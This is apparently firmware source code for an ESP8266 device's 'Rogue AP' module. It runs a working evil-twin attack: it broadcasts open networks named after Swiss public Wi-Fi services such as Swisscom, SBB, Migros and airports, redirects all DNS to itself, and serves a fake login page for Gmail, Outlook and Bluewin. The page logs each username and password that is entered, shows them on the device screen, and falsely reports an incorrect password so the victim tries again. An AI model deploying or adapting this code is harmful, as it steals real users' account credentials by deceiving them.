#include "rogue_ap.h"
#include "ui.h" // May need UI interaction later
#include "config.h" // For screen dimensions etc.
#include "utils.h" // For utility functions if needed
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <vector> // Needed for web server argument handling

// --- External UI Elements ---
extern U8G2_SSD1306_128X64_NONAME_F_HW_I2C oled;
extern bool needsRedraw;
extern UIState currentState; // To potentially switch back to main menu

// --- Predefined SSIDs ---
const char* rogue_ap_ssid_options[ROGUE_AP_SSID_COUNT] = {
    "Swiscom_Free_WiFi",
    "Airport_Guest_WiFi",
    "Migros_Guest_WiFi", // Duplicate as requested
    "Mall_CH_WiFi",
    "FreeStadtNetz",
    "SBB_Free_WiFi",
    "Hotel_Guest_CH",
    "Campus_WiFi_Open",
    "OpenParkingNet",
    "Klinik_GuestWiFi",
    "Library_Free_CH",
    "Messe_Open",
    "Fitness_GuestWiFi",
    "Mobility_OpenNet",
    "Migros_Guest_WiFi", // Duplicate as requested
    "Cafe_Open_WiFi",
    "Post_Free_WiFi" // Added new SSID
};

// --- State Variables ---
RogueAPState currentRogueAPState = ROGUE_AP_STATE_IDLE;
static int selected_ssid_index = 0;
static int display_ssid_offset = 0; // For scrolling SSID list
static char active_ssid[MAX_SSID_LEN + 1] = ""; // Currently active SSID

// --- Credential Logging ---
RogueCapturedCredentials captured_credentials_log[MAX_ROGUE_LOGS];
int captured_creds_count = 0; // Total number of *sets* captured
static int next_log_slot = 0; // Index for the next log entry (circular)
static int view_log_scroll_offset = 0; // For scrolling through logs
static bool new_capture_flag = false; // Flag for capture alert
static unsigned long capture_alert_start_time = 0;
const unsigned long CAPTURE_ALERT_DURATION = 1500; // ms

// --- Network Server Instances ---
static DNSServer dnsServer_rogue;
static ESP8266WebServer webServer_rogue(80);
static IPAddress rogueAP_IP(192, 168, 4, 1);
static IPAddress rogueAP_NetMsk(255, 255, 255, 0);

// --- Waiting Animation State (similar to MitM) ---
static char waiting_anim_char_rogue = '|';
static unsigned long last_anim_time_rogue = 0;
const unsigned long ROGUE_ANIM_INTERVAL = 250; // ms

// --- Forward Declarations for Web Handlers ---
void handleRoot_Rogue();
void handleLogin_Rogue();
void handleNotFound_Rogue();
void sendCaptivePortalHTML_Rogue(const char* error_message);

// --- Initialization ---
void rogue_ap_init() {
    Serial.println("Rogue AP Module Initialized.");
    currentRogueAPState = ROGUE_AP_STATE_IDLE;
    selected_ssid_index = 0;
    display_ssid_offset = 0;
    active_ssid[0] = '\0';
    captured_creds_count = 0;
    next_log_slot = 0;
    view_log_scroll_offset = 0;
    // Clear log buffer initially
    memset(captured_credentials_log, 0, sizeof(captured_credentials_log));
}

// --- Start Rogue AP ---
void rogue_ap_start() {
    if (currentRogueAPState != ROGUE_AP_STATE_SELECT_SSID) {
        Serial.println("Rogue AP Start: Cannot start, not in selection state.");
        return; // Should only start after selection
    }
    if (selected_ssid_index < 0 || selected_ssid_index >= ROGUE_AP_SSID_COUNT) {
        Serial.println("Rogue AP Start: Invalid SSID index selected.");
        currentRogueAPState = ROGUE_AP_STATE_IDLE; // Go back to idle
        needsRedraw = true;
        return;
    }

    strncpy(active_ssid, rogue_ap_ssid_options[selected_ssid_index], MAX_SSID_LEN);
    active_ssid[MAX_SSID_LEN] = '\0'; // Ensure null termination

    Serial.printf("Rogue AP Starting with SSID: %s\n", active_ssid);
    currentRogueAPState = ROGUE_AP_STATE_STARTING;
    needsRedraw = true;

    // Reset logs for the new session
    captured_creds_count = 0;
    next_log_slot = 0;
    view_log_scroll_offset = 0;
    memset(captured_credentials_log, 0, sizeof(captured_credentials_log));

    // Configure and start WiFi AP
    WiFi.mode(WIFI_AP);
    WiFi.softAPConfig(rogueAP_IP, rogueAP_IP, rogueAP_NetMsk);
    bool ap_started = WiFi.softAP(active_ssid); // Open network

    if (ap_started) {
        Serial.printf("Rogue AP Started. IP: %s\n", WiFi.softAPIP().toString().c_str());

        // Start DNS Server
        dnsServer_rogue.setErrorReplyCode(DNSReplyCode::NoError);
        dnsServer_rogue.start(53, "*", rogueAP_IP); // DNS port 53, redirect all domains
        Serial.println("Rogue AP: DNS Server Started.");

        // Configure and Start Web Server
        webServer_rogue.on("/", HTTP_GET, handleRoot_Rogue);
        webServer_rogue.on("/login", HTTP_POST, handleLogin_Rogue); // Endpoint for form submission
        webServer_rogue.onNotFound(handleNotFound_Rogue); // Captive portal redirection
        webServer_rogue.begin();
        Serial.println("Rogue AP: Web Server Started.");

        currentRogueAPState = ROGUE_AP_STATE_RUNNING;
        last_anim_time_rogue = millis(); // Reset animation timer
    } else {
        Serial.println("!!! Rogue AP: Failed to start SoftAP!");
        rogue_ap_stop(); // Cleanup on failure
    }
    needsRedraw = true;
}

// --- Stop Rogue AP ---
void rogue_ap_stop() {
    Serial.println("Rogue AP Stopping...");
    RogueAPState previousState = currentRogueAPState;
    currentRogueAPState = ROGUE_AP_STATE_STOPPING; // Indicate stopping phase

    webServer_rogue.stop();
    dnsServer_rogue.stop();
    WiFi.softAPdisconnect(true); // Disconnect clients and stop AP
    WiFi.mode(WIFI_STA);         // Return to STA mode (standard practice)
    WiFi.disconnect();           // Disconnect from any network

    active_ssid[0] = '\0'; // Clear active SSID
    // Keep logs until explicitly cleared or next start
    // captured_creds_count = 0;
    // next_log_slot = 0;
    // view_log_scroll_offset = 0;
    // memset(captured_credentials_log, 0, sizeof(captured_credentials_log));


    Serial.println("Rogue AP Stopped.");
    // Only go back to IDLE if we weren't already stopping/idle
    if (previousState != ROGUE_AP_STATE_IDLE && previousState != ROGUE_AP_STATE_STOPPING) {
         currentRogueAPState = ROGUE_AP_STATE_IDLE;
    }
    needsRedraw = true;
}

// --- Main Update Loop ---
void rogue_ap_update() {
    if (currentRogueAPState == ROGUE_AP_STATE_RUNNING) {
        // Process network requests
        dnsServer_rogue.processNextRequest();
        webServer_rogue.handleClient();

        // Update UI elements (animation/capture alert)
        unsigned long currentMillis = millis();

        // Check if newly captured data alert needs reset
        if (new_capture_flag && (currentMillis - capture_alert_start_time > CAPTURE_ALERT_DURATION)) {
            new_capture_flag = false;
            needsRedraw = true; // Redraw to remove alert effect
        }

        // Update waiting animation if no captures yet
        if (captured_creds_count == 0) {
            if (currentMillis - last_anim_time_rogue > ROGUE_ANIM_INTERVAL) {
                last_anim_time_rogue = currentMillis;
                switch (waiting_anim_char_rogue) {
                    case '|': waiting_anim_char_rogue = '/'; break;
                    case '/': waiting_anim_char_rogue = '-'; break;
                    case '-': waiting_anim_char_rogue = '\\'; break;
                    case '\\': waiting_anim_char_rogue = '|'; break;
                    default: waiting_anim_char_rogue = '|';
                }
                needsRedraw = true;
            }
        }
        // No blinking effect for logged count in this version yet.
    }
    // No other background tasks needed for now
    yield(); // Basic yield
}

// --- Captive Portal HTML ---
const char* captivePortalHTML_Rogue = R"rawliteral(
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Network Login</title>
<style>
 html { height: 100%; }
 body {
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
    background-color: #e7f1ff; /* Light blue background */
    margin: 0;
    padding: 20px;
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
    box-sizing: border-box;
 }
 .container {
    background-color: #ffffff;
    padding: 30px; /* Increased padding */
    border-radius: 8px;
    border: 1px solid #dee2e6; /* Subtle border */
    box-shadow: 0 4px 12px rgba(0,0,0,0.08); /* Slightly softer shadow */
    width: 100%;
    max-width: 400px;
    box-sizing: border-box;
 }
 h2 {
    text-align: center;
    color: #343a40; /* Darker grey */
    margin-bottom: 15px; /* Adjusted margin */
    font-size: 1.5em;
    font-weight: 500;
 }
 h3 {
    text-align: center;
    color: #6c757d; /* Muted grey */
    margin-top: 0;
    margin-bottom: 25px; /* Increased margin */
    font-weight: 400;
    font-size: 0.95em;
    line-height: 1.4;
 }
 label {
    display: block;
    margin-bottom: 8px; /* Increased margin */
    color: #495057; /* Darker label color */
    font-weight: 500; /* Slightly bolder label */
    font-size: 0.9em;
 }
 input[type=email], input[type=password] {
    width: 100%;
    padding: 12px 15px; /* Adjusted padding */
    margin-bottom: 15px; /* Increased margin */
    border: 1px solid #ced4da; /* Standard border color */
    border-radius: 4px;
    box-sizing: border-box;
    font-size: 1em;
    transition: border-color .15s ease-in-out, box-shadow .15s ease-in-out; /* Smooth transition */
    box-shadow: inset 0 1px 2px rgba(0,0,0,0.075);
 }
 input[type=email]:focus, input[type=password]:focus {
    border-color: #86b7fe; /* Highlight border on focus */
    outline: 0;
    box-shadow: 0 0 0 0.2rem rgba(13, 110, 253, 0.25); /* Subtle glow on focus */
 }
 button {
    background-color: #0d6efd; /* Updated Bootstrap blue */
    color: white;
    padding: 12px 20px;
    border: none;
    border-radius: 5px; /* Slightly more rounded */
    cursor: pointer;
    width: 100%;
    font-size: 1.05em; /* Slightly larger button text */
    font-weight: 500;
    margin-top: 15px; /* Added margin */
    transition: background-color 0.2s ease;
 }
 button:hover {
    background-color: #0b5ed7; /* Darker blue on hover */
 }
 .error {
    color: #dc3545; /* Standard error red */
    background-color: #f8d7da; /* Light red background for error */
    border: 1px solid #f5c2c7;
    border-radius: 4px;
    padding: 10px 15px;
    text-align: center;
    margin-bottom: 20px;
    font-weight: 500; /* Bolder error text */
    font-size: 0.9em;
 }
</style>
</head>
<body>
<div class="container">
 <h2>Secure Login Required</h2>
 <h3>Gmail, Outlook/Hotmail, and Bluewin (Swisscom)</h3>
 <p class="error">%s</p> <!-- Error message placeholder -->
 <form action="/login" method="POST">
  <label for="username">Username or Email</label>
  <input type="email" id="username" name="username" placeholder="Enter your email address" required>
  <label for="password">Password</label>
  <input type="password" id="password" name="password" placeholder="Enter your password" required>
  <button type="submit">Connect</button>
 </form>
</div>
</body>
</html>
)rawliteral";

// --- Helper to Send HTML (Chunked, similar to MitM) ---
void sendCaptivePortalHTML_Rogue(const char* error_message) {
    const char* errorPlaceholderPos = strstr(captivePortalHTML_Rogue, "%s");

    if (!errorPlaceholderPos) {
        Serial.println("Rogue AP Web Helper: Error! Placeholder not found in HTML.");
        webServer_rogue.send(500, "text/plain", "Internal Server Error: Portal template invalid.");
        return;
    }

    size_t part1Len = errorPlaceholderPos - captivePortalHTML_Rogue;
    size_t errorLen = strlen(error_message);
    size_t part2Len = strlen(errorPlaceholderPos + 2);
    size_t totalLen = part1Len + errorLen + part2Len;

    webServer_rogue.setContentLength(totalLen);
    webServer_rogue.send(200, "text/html", ""); // Send headers

    webServer_rogue.sendContent_P(captivePortalHTML_Rogue, part1Len);
    webServer_rogue.sendContent(error_message, errorLen);
    webServer_rogue.sendContent_P(errorPlaceholderPos + 2, part2Len);

    webServer_rogue.client().stop(); // Close connection
    Serial.println("Rogue AP Web Helper: Finished sending chunked response.");
}


// --- Web Server Handlers ---
void handleRoot_Rogue() {
    Serial.println("Rogue AP Web: Serving root page.");
    // In this version, we always show the login page.
    // Could add logic to show an error message on subsequent visits.
    sendCaptivePortalHTML_Rogue(""); // Send with empty error message initially
}

void handleLogin_Rogue() {
    Serial.println("Rogue AP Web: Received POST to /login");

    // Check if we have space to log more credentials
    if (captured_creds_count >= MAX_ROGUE_LOGS) {
         Serial.println("Rogue AP Web: Log full, ignoring new submission.");
         // Redirect back with an error or generic message
         sendCaptivePortalHTML_Rogue("Login temporarily unavailable. Please try again later.");
         return;
    }

    // Capture credentials
    RogueCapturedCredentials& current_log = captured_credentials_log[next_log_slot];
    memset(&current_log, 0, sizeof(RogueCapturedCredentials)); // Clear slot first

    if (webServer_rogue.hasArg("username")) strncpy(current_log.username, webServer_rogue.arg("username").c_str(), ROGUE_MAX_FIELD_LEN);
    if (webServer_rogue.hasArg("password")) strncpy(current_log.password, webServer_rogue.arg("password").c_str(), ROGUE_MAX_FIELD_LEN);

    current_log.data_present = true; // Mark slot as containing data

    Serial.println("Rogue AP Web: Credentials captured:");
    Serial.printf("  User: %s \n  Pass: %s\n", current_log.username, current_log.password);

    // Update log tracking
    next_log_slot = (next_log_slot + 1) % MAX_ROGUE_LOGS;
    captured_creds_count = min(captured_creds_count + 1, MAX_ROGUE_LOGS); // Increment count, cap at max

    // Trigger UI alert
    new_capture_flag = true;
    capture_alert_start_time = millis();
    needsRedraw = true;

    // Send a generic "incorrect password" or "connecting" message and redirect
    // This makes the user think they mistyped or are being connected
    sendCaptivePortalHTML_Rogue("Incorrect password or connection error. Please try again.");

    // Alternatively, redirect back to root immediately:
    // webServer_rogue.sendHeader("Location", "/", true);
    // webServer_rogue.send(302, "text/plain", "Redirecting...");
}

void handleNotFound_Rogue() {
    Serial.println("Rogue AP Web: handleNotFound triggered, redirecting to root.");
    webServer_rogue.sendHeader("Location", "/", true); // Redirect to root (captive portal trigger)
    webServer_rogue.send(302, "text/plain", "");
}

// --- Draw Rogue AP UI ---
void rogue_ap_draw() {
    oled.setFont(u8g2_font_6x10_tf); // Base font

    switch (currentRogueAPState) {
        case ROGUE_AP_STATE_IDLE:
            oled.drawStr(0, 25, "Rogue AP Ready");
            oled.setFont(u8g2_font_5x7_tf); // Smaller font for prompt
            oled.drawStr(0, SCREEN_HEIGHT - 1, "LONG: Select SSID");
            break;

        case ROGUE_AP_STATE_SELECT_SSID:
            {
                // oled.drawStr(0, 20, "Select Rogue SSID:"); // Title position
                int yPos = 22; // Start list higher
                int line_height = 9; // Smaller line height for 5x7 font
                const int items_per_page = 4; // Show 4 SSIDs

                oled.setFont(u8g2_font_5x7_tf); // Use smaller font for list

                for (int i = 0; i < items_per_page; ++i) {
                    int current_item_index = display_ssid_offset + i;
                    if (current_item_index >= ROGUE_AP_SSID_COUNT) break;

                    char buffer[40];
                    char select_char = (current_item_index == selected_ssid_index) ? '>' : ' ';
                    snprintf(buffer, sizeof(buffer), "%c %s", select_char, rogue_ap_ssid_options[current_item_index]);
                    oled.drawStr(0, yPos + (i * line_height), buffer);
                }

                // Draw scroll indicators
                 if (ROGUE_AP_SSID_COUNT > items_per_page) {
                    if (display_ssid_offset > 0) oled.drawTriangle(SCREEN_WIDTH - 6, 16, SCREEN_WIDTH - 9, 20, SCREEN_WIDTH - 3, 20); // Up arrow (Adjust Y)
                    if (display_ssid_offset + items_per_page < ROGUE_AP_SSID_COUNT) oled.drawTriangle(SCREEN_WIDTH - 6, SCREEN_HEIGHT - 3, SCREEN_WIDTH - 9, SCREEN_HEIGHT - 7, SCREEN_WIDTH - 3, SCREEN_HEIGHT - 7); // Down arrow
                 }

                oled.drawStr(0, SCREEN_HEIGHT - 1, "S:Scroll L:Start AP");
            }
            break;

        case ROGUE_AP_STATE_STARTING:
            oled.drawStr(0, 35, "Starting Rogue AP...");
            break;

        case ROGUE_AP_STATE_RUNNING:
            {
                oled.setFont(u8g2_font_5x7_tf); // Use smaller font for the title
                oled.drawStr(0, 22, "Rogue AP Active:"); // Moved down slightly
                oled.setFont(u8g2_font_6x10_tf); // Set back to default font
                oled.drawStr(4, 32, active_ssid); // Show active SSID

                char status_buffer[25];
                char footer_buffer[25];

                bool show_alert = new_capture_flag && (millis() - capture_alert_start_time < CAPTURE_ALERT_DURATION);

                if (captured_creds_count > 0) {
                    snprintf(status_buffer, sizeof(status_buffer), "Captured: %d", captured_creds_count);
                     snprintf(footer_buffer, sizeof(footer_buffer), "S:View Logs L:Stop");
                } else {
                    snprintf(status_buffer, sizeof(status_buffer), "Waiting... %c", waiting_anim_char_rogue);
                     snprintf(footer_buffer, sizeof(footer_buffer), "LONG: Stop");
                }

                int status_y = 46;
                 if (show_alert) {
                     // Simple invert effect for capture alert
                     int text_width = oled.getStrWidth(status_buffer);
                     oled.setDrawColor(1); // Set color to foreground (white)
                     oled.drawBox(0, status_y - 10 + 1, text_width + 2, 10 + 1); // Draw white box behind text area
                     oled.setDrawColor(0); // Set color to background (black) for text
                     oled.drawStr(1, status_y, status_buffer); // Draw text slightly offset
                     oled.setDrawColor(1); // Reset draw color
                 } else {
                     oled.drawStr(0, status_y, status_buffer); // Draw normally
                 }

                oled.setFont(u8g2_font_5x7_tf); // Smaller font for footer
                oled.drawStr(0, SCREEN_HEIGHT - 1, footer_buffer);
            }
            break;

        case ROGUE_AP_STATE_VIEW_LOGS:
            {
                // --- Draw Title Line --- 
                oled.setFont(u8g2_font_5x7_tf); // Use smaller font for title elements
                int yPos = 22; // Starting Y for the title line
                const char* titleText = "Captured Creds:";
                oled.drawStr(0, yPos, titleText);
                int titleWidth = oled.getStrWidth(titleText);

                if (captured_creds_count > 0) {
                    char logCountBuffer[15];
                    snprintf(logCountBuffer, sizeof(logCountBuffer), " Log %d/%d", 
                             view_log_scroll_offset + 1, 
                             captured_creds_count);
                    oled.drawStr(titleWidth + 2, yPos, logCountBuffer); // Draw next to title
                }
                yPos += 10; // Move down for next content line (adjust gap as needed)

                // --- Draw Log Content --- 
                if (captured_creds_count == 0) {
                    oled.setFont(u8g2_font_6x10_tf); // Back to default for message
                    oled.drawStr(10, 40, "[No Logs]");
                } else {
                    oled.setFont(u8g2_font_5x7_tf); // Keep smaller font for logs
                    int line_height = 8; // Height for 5x7 font

                    // Draw scroll indicators (position adjusted slightly)
                     if (captured_creds_count > 1) { 
                        if (view_log_scroll_offset > 0) oled.drawTriangle(SCREEN_WIDTH - 6, 16, SCREEN_WIDTH - 9, 20, SCREEN_WIDTH - 3, 20); // Up arrow
                        if (view_log_scroll_offset < captured_creds_count - 1) oled.drawTriangle(SCREEN_WIDTH - 6, SCREEN_HEIGHT - 3, SCREEN_WIDTH - 9, SCREEN_HEIGHT - 7, SCREEN_WIDTH - 3, SCREEN_HEIGHT - 7); // Down arrow
                     }

                    // Calculate actual index
                    int start_idx = (captured_creds_count <= MAX_ROGUE_LOGS) ? 0 : next_log_slot;
                    int actual_idx = (start_idx + view_log_scroll_offset) % MAX_ROGUE_LOGS;
                    const RogueCapturedCredentials& log = captured_credentials_log[actual_idx];

                    if (log.data_present) {
                        char userBuffer[ROGUE_MAX_FIELD_LEN + 15]; 
                        snprintf(userBuffer, sizeof(userBuffer), "User: %s", log.username);
                        oled.drawStr(2, yPos, userBuffer); yPos += line_height;
                        
                        // Draw Password with wrapping
                        const char* passLabel = "Pass: ";
                        oled.drawStr(2, yPos, passLabel); // Draw label
                        int passLabelWidth = oled.getStrWidth(passLabel);
                        int passXOffset = 2 + passLabelWidth + 2; // X offset for password value
                        int maxCharsPerLine = 19; // Max chars before wrap
                        int passLen = strlen(log.password);
                        
                        char passChunkBuffer[maxCharsPerLine + 1];
                        if (passLen > maxCharsPerLine) {
                            // First line
                            strncpy(passChunkBuffer, log.password, maxCharsPerLine);
                            passChunkBuffer[maxCharsPerLine] = '\0';
                            oled.drawStr(passXOffset, yPos, passChunkBuffer);
                            yPos += line_height; // Move to next line
                            // Second line (remaining chars)
                            strncpy(passChunkBuffer, log.password + maxCharsPerLine, maxCharsPerLine);
                            passChunkBuffer[maxCharsPerLine] = '\0'; // Ensure termination even if passLen > 2*maxCharsPerLine
                            oled.drawStr(passXOffset, yPos, passChunkBuffer); // Draw indented
                        } else {
                            // No wrapping needed
                             oled.drawStr(passXOffset, yPos, log.password);
                        }
                        yPos += line_height + 2; // Extra gap after password block

                    } else {
                         oled.setFont(u8g2_font_6x10_tf); // Back to default font for message
                         oled.drawStr(10, yPos + 5, "[Log Empty]"); // Adjusted position
                    }
                }
                oled.setFont(u8g2_font_5x7_tf); // Ensure footer uses small font
                oled.drawStr(0, SCREEN_HEIGHT - 1, "S:Next Log L:Back");
            }
            break;

        case ROGUE_AP_STATE_STOPPING:
            oled.drawStr(0, 35, "Stopping Rogue AP...");
            break;

        default:
            oled.drawStr(0, 35, "Rogue AP: Unknown State");
            break;
    }
}

// --- Handle Button Input ---
void rogue_ap_handle_input(ButtonPressType pressType) {
     switch (currentRogueAPState) {
        case ROGUE_AP_STATE_IDLE:
            if (pressType == ButtonPressType::LONG_PRESS) {
                currentRogueAPState = ROGUE_AP_STATE_SELECT_SSID;
                selected_ssid_index = 0; // Reset selection
                display_ssid_offset = 0;
                needsRedraw = true;
            }
            break;

        case ROGUE_AP_STATE_SELECT_SSID:
            {
                const int items_per_page = 4; // Match drawing
                if (pressType == ButtonPressType::SHORT_PRESS) {
                    // Scroll down through SSIDs
                    selected_ssid_index = (selected_ssid_index + 1) % ROGUE_AP_SSID_COUNT;
                    // Adjust display offset
                    if (selected_ssid_index < display_ssid_offset) display_ssid_offset = selected_ssid_index; // Wrap top
                    else if (selected_ssid_index >= display_ssid_offset + items_per_page) display_ssid_offset = selected_ssid_index - items_per_page + 1; // Scroll down
                    needsRedraw = true;
                } else if (pressType == ButtonPressType::LONG_PRESS) {
                    // Select SSID and attempt to start
                    rogue_ap_start();
                    // State changes handled within rogue_ap_start()
                }
            }
            break;

        case ROGUE_AP_STATE_RUNNING:
            if (pressType == ButtonPressType::LONG_PRESS) {
                rogue_ap_stop();
            } else if (pressType == ButtonPressType::SHORT_PRESS) {
                // Enter log view only if logs exist
                if (captured_creds_count > 0) {
                    currentRogueAPState = ROGUE_AP_STATE_VIEW_LOGS;
                    view_log_scroll_offset = 0; // Start at the first log
                    needsRedraw = true;
                }
            }
            break;

        case ROGUE_AP_STATE_VIEW_LOGS:
             if (pressType == ButtonPressType::LONG_PRESS) {
                 currentRogueAPState = ROGUE_AP_STATE_RUNNING; // Go back to running screen
                 needsRedraw = true;
             } else if (pressType == ButtonPressType::SHORT_PRESS) {
                 // Scroll to the next log entry
                 if (captured_creds_count > 1) { // Only scroll if more than one
                     view_log_scroll_offset = (view_log_scroll_offset + 1) % captured_creds_count;
                     needsRedraw = true;
                 }
             }
            break;

        case ROGUE_AP_STATE_STARTING:
        case ROGUE_AP_STATE_STOPPING:
            // Ignore input during transitions
            break;

        default: // Go back to idle on long press from unknown state
            if (pressType == ButtonPressType::LONG_PRESS) {
                currentRogueAPState = ROGUE_AP_STATE_IDLE;
                needsRedraw = true;
            }
            break;
     }
} 